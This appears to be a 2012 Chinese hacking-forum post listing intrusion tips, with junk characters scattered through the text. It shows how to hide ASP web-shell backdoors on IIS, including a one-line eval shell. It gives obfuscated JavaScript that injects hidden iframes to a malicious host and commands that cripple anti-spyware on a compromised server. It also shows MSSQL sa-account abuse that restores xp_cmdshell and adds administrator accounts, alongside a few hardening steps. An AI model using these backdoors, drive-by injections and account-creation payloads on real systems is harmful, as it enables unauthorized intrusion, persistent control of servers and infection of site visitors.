' f3 D* h+ g) V5 s e" l53、隐藏ASP后门的两种方法4 a; k1 r2 ]/ P
1、建立非标准目录:mkdir images..\1 j4 | B" p( s1 l! g2 y+ X; N
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp* M5 w1 S) o- K, E3 {2 ~, N. \
通过web访问ASP木马:http://ip/images../news.asp?action=login/ K3 a/ F6 e$ ?; o% X
如何删除非标准目录:rmdir images..\ /s4 I$ z( i$ A% b+ w( ^; ^! l
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
% K& c+ |7 v9 ?mkdir programme.asp
' u/ V7 x. ~, A0 T新建1.txt文件内容:<!--#include file=”12.jpg”-->, g* u' p9 f) r/ _6 ?4 J2 J
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件6 R/ L; _8 _& M* c1 P* ]
attrib +H +S programme.asp
- L" S. f/ w, e5 ?$ e: {通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
7 v1 ]: a* }2 ^' e, N7 X- n0 t8 I" c) I `% t: Y6 A' X$ ^: S/ ~
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。5 a$ u! I4 }6 ~& ?' D6 b) f* U
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
# R$ w- D& ~) D
( X/ M0 P3 ^: d0 J55、JS隐蔽挂马
) d) ^2 h/ v* E% M; m! Y& r) P7 l1.
$ N- |' Y9 D7 r! i0 u6 [) X8 n" x% Bvar tr4c3="<iframe src=ht";2 E/ a9 U& I C. w/ L) M: T. g0 |
tr4c3 = tr4c3+"tp:/";8 b- {4 I- H) j3 c5 S. \1 B4 I
tr4c3 = tr4c3+"/ww";/ Q% v" y$ X ^2 O& c
tr4c3 = tr4c3+"w.tr4";- @3 z: [: q! ]; X5 E
tr4c3 = tr4c3+"c3.com/inc/m";
" s8 p2 u- A% I: E# Q- }tr4c3 = tr4c3+"m.htm style="display:none"></i";% ^5 R' n: R7 b+ F! I4 s0 {
tr4c3 =tr4c3+"frame>'";1 a5 v4 N$ K# T$ Y' f' L7 b
document.write(tr4c3);1 p9 ]. c9 n9 ~5 K; K5 v
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
: K+ V- s( t! D# @) Z+ ?
7 R: ]2 `* e& m' d! k& d {, _2.
5 H% C& }8 I @" j" Z+ e转换进制,然后用EVAL执行。如
( G+ g: ?9 u+ Qeval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");( @8 H/ a; W4 J, }
不过这个有点显眼。0 y+ r5 T9 f. l$ Y* ]& u, m& ^
3.! C/ j3 ~# o. M- m
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');& |; E7 \) y/ l0 S* Q; W+ _) I7 b
最后一点,别忘了把文件的时间也修改下。
% Y; P. P9 e& N( ^. ~4 a# Y3 R y! l$ z8 N
56.3389终端入侵常用DOS命令3 a7 y3 g: R* K/ G
taskkill taskkill /PID 1248 /t: B+ j9 L, P3 q x
; d% {1 [8 }9 F+ k) c/ @) n: T. _
tasklist 查进程* _: g/ J& k1 [; u6 w
" _' L0 \' ?5 o) v5 X$ n5 m C8 @/ tcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
# q/ Q$ B6 Y4 u. riisreset /reboot4 i4 t/ [& n2 @8 P& j$ l
tsshutdn /reboot /delay:1 重起服务器4 S+ t; |( p( Q: V6 i1 T
! K2 M" }& L9 F8 L
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
' m2 P h1 Z& }( b6 {: ?& [" g! O! g; n8 S+ l s H8 _
query user 查看当前终端用户在线情况6 {9 R! }! v; P6 I% e( x9 S5 J
; g) s/ g# p. i4 Y+ c# X
要显示有关所有会话使用的进程的信息,请键入:query process *, o' ~# _! T" b* t6 {# Z5 }
7 T% L4 E$ u( D: D s7 M8 S2 F2 \要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
, ~8 |/ ^8 X4 P" d3 |2 J0 }" X6 B9 D" ]7 |0 j1 Q; ]9 O
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
* v1 }. k& j; P) E' G
6 [! G/ s# `" \& X ]要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
. M- G7 ~5 T6 p2 \ d' |0 m* A; \
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启+ s, U ?& |* Y y1 u7 s6 f5 d
" T; q2 X: J) M命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统$ j6 n" z' m( y% K/ |5 n! \
1 z$ `: i& i0 Y, D6 u2 z6 ]3 h/ R
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
: d$ C9 g6 R' X3 g O* D, ^0 h$ d+ ]+ y& H
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
! z/ R' Z7 _9 G1 k! G
. S! z" F# U) v" A {6 u56、在地址栏或按Ctrl+O,输入:
- j' U6 c1 _& h5 T) F& Zjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;* ^ h* }6 A4 D* T0 _, S" ^6 C
9 ` {; n: g: ], X3 Q+ {源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
: u" `2 V0 B5 I' M: R2 R* h9 Q [
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
* g$ @$ k( ^9 Z2 Q, e! C# G用net localgroup administrators是可以看到管理组下,加了$的用户的。$ p% P4 Y9 r# z- ^8 ?
) E% `8 ^: [3 v' Y" A
58、 sa弱口令相关命令( e9 _/ Z, a5 ^2 S
$ j' O$ Y, ]* _) c4 z6 y
一.更改sa口令方法:
7 r- w, s$ g# \$ j3 Z用sql综合利用工具连接后,执行命令:
% \5 ]# R! _7 P+ u' nexec sp_password NULL,'20001001','sa'1 v- P7 _! J: B3 N1 n) v4 v
(提示:慎用!)
. m* r2 D% u0 ?) q6 L6 r3 f; A+ v& @4 C% _' ] J) w+ j
二.简单修补sa弱口令.
( t- z+ V: p& `2 [
# x s5 v5 c$ @: v* R方法1:查询分离器连接后执行:
0 U( V9 c B1 f: H6 i$ Y# \if exists (select * from
6 N: p: `* ^* L. f& F) u* kdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
; r! k- p. X. y8 S3 B) ~+ I( yOBJECTPROPERTY(id, N'IsExtendedProc') = 1)& C6 C: ~3 Z7 j9 y6 W( D' k
h. e2 v: z; }, o: ^6 S
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
9 f$ @7 y; m2 E* C, b" T) F7 E
GO3 o( |2 R0 ~; [
/ ~$ i5 ]0 Y. C. \5 I' [2 k9 X9 `$ X& w9 }
然后按F5键命令执行完毕- c* F# [2 v( o9 N& l# Z6 M, C
; Y% t) J5 H' d) z1 b& v
方法2:查询分离器连接后
0 v/ f+ D1 Y7 {第一步执行:use master
/ u0 j( j) u' [! C) n- \第二步执行:sp_dropextendedproc 'xp_cmdshell'
- `/ F$ C* [1 @2 r q7 p2 x6 T然后按F5键命令执行完毕& h( X) B7 ~5 K! x |. p, G: E
% ]; J7 ^/ W. `1 u; L- E
* p+ ?# J" `' t' a
三.常见情况恢复执行xp_cmdshell.
& a! Y; c$ v) ?' v$ L4 R
/ P3 A* w B4 g% f7 _. ?+ W( G
7 b& m3 e' U3 A% R a/ Z q' ?7 ?, {; D1 未能找到存储过程'master..xpcmdshell'.4 R2 Z" v* T5 J5 d# x) I" w
恢复方法:查询分离器连接后,& u3 n, A' @* _, J
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int' k0 N+ S# U. S- V9 e
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
8 P: ]" w& _% M2 N然后按F5键命令执行完毕* E1 Y! I, x7 Z9 a; g% [+ D( \
6 N- Q& z3 m) ^4 P+ f2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)% V; v# r' @8 b3 M' f+ M: H* A
恢复方法:查询分离器连接后," \" g! G u" n5 \( v" ^- m* g7 r
第一步执行:sp_dropextendedproc "xp_cmdshell". D; f( @% C2 Q6 i: t& I8 ?
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
5 ?. m$ y1 F) x+ ]$ `/ z9 q. v+ D然后按F5键命令执行完毕+ E5 ~7 F. B( E* }) p* J( Z1 ~0 r
' ~. q/ ~. x7 h3 w O( {: S
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)5 \% `( { y6 f# J3 J: u7 k
恢复方法:查询分离器连接后,
0 W5 u. \ Q) H7 t1 p+ A7 @第一步执行:exec sp_dropextendedproc 'xp_cmdshell': ~3 z& v' d5 r5 u }+ v
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' * J# R; L' m" ~; e
然后按F5键命令执行完毕
2 F" f- k# b9 A, G' Q3 S2 L9 T
$ p x5 ?' P" w( v4 d* t四.终极方法.3 s' F% H9 l3 M4 a3 f2 }
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:0 U3 c" P! `8 s+ b I4 {+ C
查询分离器连接后,/ j: g$ x7 g: Y% y1 \
2000servser系统:
7 u3 P, e3 _3 ~) {8 Z% jdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
1 J: Z8 U/ a# i: I, m' K8 Z+ Z$ a8 G+ r/ n- F5 ^7 H) V
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add' o r' Q! r' }+ n- I+ O2 p
$ Q& m3 `" q6 A' X. exp或2003server系统:7 _( j) Y: c" K5 u
3 A* D8 z4 z$ C& }8 R/ o4 u
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'% c7 A7 j% U0 |3 m$ \. a3 l$ k
, r( H" q3 k3 l% `+ gdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'5 q( E1 Z3 v2 N( {
|
发表于 2012-9-15 14:51:03
收藏
支持
反对